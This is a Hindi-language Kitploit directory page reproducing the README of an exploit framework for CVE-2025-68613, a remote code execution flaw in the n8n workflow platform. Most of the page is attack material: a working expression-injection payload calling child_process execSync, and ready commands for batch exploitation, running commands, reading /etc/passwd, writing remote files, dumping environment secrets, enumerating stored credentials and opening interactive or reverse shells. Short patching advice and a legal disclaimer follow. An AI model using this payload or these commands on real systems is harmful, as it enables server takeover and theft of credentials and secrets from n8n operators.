Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ वर्कफ़्लो ऑटोमेशन दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
रिमोट एक्सेस टूल
पेलोड डेवलपमेंट
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ वर्कफ़्लो ऑटोमेशन दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
5328 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

n8n God Mode Ultimate - CVE-2025-68613 स्कैनर और शोषण ढांचा

n8n God Mode Ultimate

उन्नत n8n कार्यप्रवाह स्वचालन RCE स्कैनर और शोषण उपकरण

Python Version License CVE CVSS Score


🎯 अवलोकन

n8n God Mode Ultimate एक व्यापक सुरक्षा परीक्षण ढांचा है जो n8n कार्यप्रवाह स्वचालन प्लेटफार्मों में CVE-2025-68613 का पता लगाने और मान्य करने के लिए डिज़ाइन किया गया है। यह महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता कार्यप्रवाह निष्पादन संदर्भों में अभिव्यक्ति इंजेक्शन के माध्यम से n8n संस्करणों को प्रभावित करती है।

CVE-2025-68613 विवरण
  • CVSS स्कोर: 10.0 (गंभीर)
  • हमला वेक्टर: नेटवर्क
  • हमला जटिलता: निम्न
  • आवश्यक विशेषाधिकार: निम्न (मान्य क्रेडेंशियल्स)
  • उपयोगकर्ता सहभागिता: कोई नहीं
  • भेद्यता प्रकार: अभिव्यक्ति इंजेक्शन → रिमोट कोड निष्पादन

प्रभावित संस्करण:

  • n8n >= 0.211.0 और < 1.120.4
  • n8n >= 1.121.0 और < 1.121.1

पैच किए गए संस्करण:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ विशेषताएँ

🔍 पता लगाना और स्कैनिंग

  • बुद्धिमान संस्करण पहचान - साइनइन पेज मेटाडेटा से n8n संस्करण निकालें
  • बैच स्कैनिंग - प्रगति ट्रैकिंग के साथ मल्टी-थ्रेडेड समवर्ती लक्ष्य स्कैनिंग
  • एकाधिक स्कैन मोड:
    • --detect - केवल संस्करण पहचान (सबसे तेज, गैर-हस्तक्षेपकारी)
    • --safe - शोषण के बिना सुरक्षित भेद्यता जाँच
    • --poc - RCE प्रूफ-ऑफ-कॉन्सेप्ट मान्यकरण
    • --exploit - पूर्ण शोषण मोड

💣 शोषण क्षमताएँ

  • 4 शोषण तकनीकें:
    1. शेड्यूल ट्रिगर - स्वचालित निष्पादित कार्यप्रवाह (सबसे विश्वसनीय)
    2. वेबहुक ट्रिगर - HTTP-ट्रिगर निष्पादन
    3. कोड नोड - प्रत्यक्ष child_process पहुंच
    4. अभिव्यक्ति इंजेक्शन - मैनुअल अभिव्यक्ति निष्पादन

🎮 गॉड मोड विशेषताएँ

  • इंटरैक्टिव शेल - कमांड इतिहास के साथ पूर्ण रिमोट शेल
  • फ़ाइल संचालन:
    • read <फ़ाइल> - रिमोट फ़ाइलें पढ़ें
    • write <फ़ाइल> <सामग्री> - लक्ष्य पर फ़ाइलें लिखें
  • पर्यावरण निष्कर्षण - सभी पर्यावरण चर डंप करें
  • सिस्टम जानकारी - OS विवरण, नेटवर्क कॉन्फ़िग, प्रक्रिया जानकारी
  • रिवर्स शेल - वैकल्पिक रिवर्स शेल पेलोड जनरेशन
  • कमांड इतिहास - अंतर्निहित इतिहास ट्रैकिंग

📊 उन्नत क्षमताएँ

  • क्रेडेंशियल गणना - API के माध्यम से संग्रहीत क्रेडेंशियल निकालें
  • कार्यप्रवाह डंपिंग - सभी कार्यप्रवाहों को मेटाडेटा के साथ निर्यात करें
  • कॉन्फ़िगरेशन निष्कर्षण - पूर्ण सिस्टम कॉन्फ़िग डंप
  • उपयोगकर्ता गणना - सभी n8n उपयोगकर्ताओं की सूची बनाएं
  • निष्पादन लॉग विश्लेषण - कार्यप्रवाह निष्पादन से कमांड आउटपुट पार्स करें
  • स्वचालित सफाई - निष्पादन के बाद वैकल्पिक कार्यप्रवाह विलोपन

🚀 स्थापना

पूर्वापेक्षाएँ

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip3 --version

निर्भरताएँ स्थापित करें

root@kitploit:~
# Clone the repository
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Install required packages
pip3 install -r requirements.txt

आवश्यकताएँ

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 उपयोग

मूल उपयोग

root@kitploit:~
# Display help menu
python3 n8n-godmode-ultimate.py -h

# Detect n8n version (non-intrusive)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Safe vulnerability check
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Proof-of-concept RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Full exploitation
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

गॉड मोड संचालन

root@kitploit:~
# Execute single command
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Read remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Write remote file
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Extract environment variables
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Interactive shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

बैच स्कैनिंग

root@kitploit:~
# Scan multiple targets from file
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Batch exploitation
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

targets.txt प्रारूप:

root@kitploit:~
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

इंटरैक्टिव शेल कमांड

एक बार शेल मोड में (--shell):

root@kitploit:~
n8n> whoami              # Execute command
n8n> read /etc/passwd    # Read file
n8n> env                 # Show environment variables
n8n> info                # System information
n8n> history             # Command history
n8n> exit                # Exit shell

🛠️ कमांड लाइन विकल्प

लक्ष्य विकल्प

root@kitploit:~
-u, --url URL             लक्ष्य n8n URL
-l, --list FILE           लक्ष्य URL वाली फ़ाइल
-t, --threads NUM         बैच स्कैनिंग के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)

प्रमाणीकरण

root@kitploit:~
-e, --email EMAIL         n8n उपयोगकर्ता ईमेल
-p, --password PASS       n8n उपयोगकर्ता पासवर्ड

स्कैन मोड

root@kitploit:~
--detect                  केवल संस्करण पहचान (सबसे तेज)
--safe                    शोषण के बिना सुरक्षित जाँच
--poc                     RCE प्रूफ-ऑफ-कॉन्सेप्ट
--exploit                 पूर्ण शोषण मोड

गॉड मोड

root@kitploit:~
--god                     गॉड मोड सक्षम करें
--cmd COMMAND             एकल कमांड निष्पादित करें
--read-file PATH          रिमोट फ़ाइल पढ़ें
--write-file PATH         रिमोट फ़ाइल लिखें
--content DATA            लेखन संचालन के लिए सामग्री
--dump-env                सभी पर्यावरण चर निकालें
--shell                   इंटरैक्टिव शेल मोड
--revshell HOST:PORT      रिवर्स शेल पेलोड

शोषण विकल्प

root@kitploit:~
--mode MODE               शोषण मोड: schedule|webhook|code|expression (डिफ़ॉल्ट: schedule)
--timeout SEC             सेकंड में कमांड टाइमआउट (डिफ़ॉल्ट: 30)
--cleanup                 निष्पादन के बाद कार्यप्रवाह हटाएं
-k, --insecure           SSL सत्यापन अक्षम करें
-v, --verbose            विस्तृत आउटपुट
-q, --quiet              न्यूनतम आउटपुट

🔬 तकनीकी विवरण

शोषण पद्धति

1. शेड्यूल ट्रिगर (अनुशंसित)

एक कार्यप्रवाह बनाता है जिसमें एक शेड्यूल ट्रिगर होता है जो हर 3 सेकंड में स्वचालित रूप से निष्पादित होता है। सबसे विश्वसनीय तरीका।

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. वेबहुक ट्रिगर

एक HTTP वेबहुक एंडपॉइंट बनाता है जो ट्रिगर होने पर कमांड निष्पादित करता है।

3. कोड नोड

कोड को सीधे child_process पहुंच वाले कोड नोड में इंजेक्ट करता है।

4. अभिव्यक्ति इंजेक्शन

n8n के अभिव्यक्ति मूल्यांकन प्रणाली के माध्यम से मैनुअल निष्पादन।

संस्करण पहचान

साइनइन पेज में base64-एन्कोडेड Sentry कॉन्फ़िगरेशन से संस्करण निकालता है:

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

उपयोग किए गए API एंडपॉइंट

  • /rest/login - प्रमाणीकरण
  • /rest/workflows - कार्यप्रवाह CRUD संचालन
  • /rest/credentials - क्रेडेंशियल गणना
  • /rest/executions - निष्पादन लॉग पुनर्प्राप्ति
  • /rest/users - उपयोगकर्ता गणना
  • /rest/settings - सिस्टम कॉन्फ़िगरेशन

📊 आउटपुट उदाहरण

संस्करण पहचान

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Target: https://target.example.com
[✓] n8n Version: 1.36.1
[!] Status: VULNERABLE (< 1.120.4)

RCE प्रूफ-ऑफ-कॉन्सेप्ट

root@kitploit:~
[*] Authentication successful
[*] Creating exploitation workflow...
[*] Workflow ID: hd6LxSY765WBThqd
[*] Executing command: whoami
[✓] Command executed successfully!
[+] Output: root

इंटरैक्टिव शेल

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Environment Variables:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ रक्षात्मक उपाय

तत्काल कार्रवाई

  1. पैच किए गए संस्करण में अपग्रेड करें (>= 1.120.4 या >= 1.121.1)
  2. डिफ़ॉल्ट क्रेडेंशियल अक्षम करें ([email protected]:admin)
  3. मजबूत प्रमाणीकरण लागू करें (MFA अनुशंसित)
  4. नेटवर्क विभाजन - n8n इंस्टेंस एक्सेस प्रतिबंधित करें
  5. कार्यप्रवाह ऑडिट करें - सभी सक्रिय कार्यप्रवाहों की समीक्षा करें
  6. निष्पादन लॉग की निगरानी करें - संदिग्ध गतिविधि की जाँच करें

दीर्घकालिक सख्तीकरण

  • ऑडिट लॉगिंग सक्षम करें
  • IP श्वेतसूची लागू करें
  • OAuth/SSO प्रमाणीकरण का उपयोग करें
  • नियमित सुरक्षा मूल्यांकन
  • n8n को अपडेट रखें
  • डेटाबेस एन्क्रिप्शन at rest
  • सुरक्षित क्रेडेंशियल संग्रहण
  • नेटवर्क ट्रैफ़िक निगरानी

⚠️ कानूनी अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए

यह उपकरण शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। उपयोगकर्ताओं को सभी लागू कानूनों और विनियमों का पालन करना होगा।

⚖️ कानूनी आवश्यकताएँ

आपको यह करना होगा:

  • ✅ परीक्षण से पहले लिखित प्राधिकरण प्राप्त करें
  • ✅ केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या परीक्षण की अनुमति है
  • ✅ जिम्मेदार प्रकटीकरण प्रथाओं का अनुपालन करें
  • ✅ लागू कानूनों और विनियमों का पालन करें
  • ✅ रक्षात्मक सुरक्षा उद्देश्यों के लिए उपयोग करें

आपको यह नहीं करना चाहिए:

  • ❌ स्पष्ट अनुमति के बिना सिस्टम का परीक्षण न करें
  • ❌ दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें
  • ❌ सेवा से वंचित हमले न करें
  • ❌ प्राधिकरण के बिना डेटा चुराएं या संशोधित न करें
  • ❌ सहमति के बिना उत्पादन सिस्टम पर तैनात न करें

📜 देयता

लेखक इस उपकरण के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच निम्नलिखित के तहत अवैध है:

  • कंप्यूटर फ्रॉड एंड एब्यूज एक्ट (CFAA) - यूएसए
  • कंप्यूटर मिसयूज़ एक्ट - यूके
  • EU साइबरक्राइम निर्देश
  • दुनिया भर में समान कानून

अपने जोखिम पर उपयोग करें। आप अपने कार्यों के लिए जिम्मेदार हैं।


🤝 योगदान

योगदान का स्वागत है! कृपया इन दिशानिर्देशों का पालन करें:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर शाखा बनाएं (git checkout -b feature/improvement)
  3. अपने बदलाव कमिट करें (git commit -am 'Add new feature')
  4. शाखा में पुश करें (git push origin feature/improvement)
  5. पुल रिक्वेस्ट बनाएं

आचार संहिता

  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  • सुरक्षा सुविधाओं को स्पष्ट रूप से दस्तावेज़ित करें
  • उचित त्रुटि हैंडलिंग शामिल करें
  • जटिल तर्क के लिए टिप्पणी जोड़ें
  • सबमिट करने से पहले पूरी तरह से परीक्षण करें

📚 संदर्भ

CVE जानकारी

  • CVE-2025-68613 - NVD
  • n8n सुरक्षा सलाहकार

n8n दस्तावेज़ीकरण

  • n8n आधिकारिक दस्तावेज़ीकरण
  • n8n API संदर्भ
  • n8n सुरक्षा सर्वोत्तम अभ्यास

सुरक्षा अनुसंधान

  • अभिव्यक्ति इंजेक्शन भेद्यता
  • कार्यप्रवाह स्वचालन सुरक्षा

👨‍💻 लेखक

Satyam Rastogi

  • GitHub: @hackersatyamrastogi
  • वेबसाइट: https://www.satyamrastogi.com
  • ट्विटर: @hackersatyamrastogi

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 आभार

  • एक अद्भुत कार्यप्रवाह स्वचालन प्लेटफ़ॉर्म बनाने के लिए n8n टीम
  • n8n समुदाय में सुरक्षा शोधकर्ता
  • ओपन-सोर्स सुरक्षा उपकरण जिन्होंने इस प्रोजेक्ट को प्रेरित किया

📞 समर्थन

सुरक्षा मुद्दों के लिए, कृपया जिम्मेदारी से रिपोर्ट करें:

  • सुरक्षा मुद्दे: एक निजी सुरक्षा सलाहकार खोलें
  • बग रिपोर्ट: GitHub Issues का उपयोग करें
  • सुविधा अनुरोध: GitHub Discussion खोलें

⭐ यदि आपको यह उपयोगी लगा तो इस रिपॉजिटरी को स्टार करें!

सुरक्षा शोधकर्ताओं द्वारा, सुरक्षा शोधकर्ताओं के लिए 💻 से बनाया गया

टूल डाउनलोड करें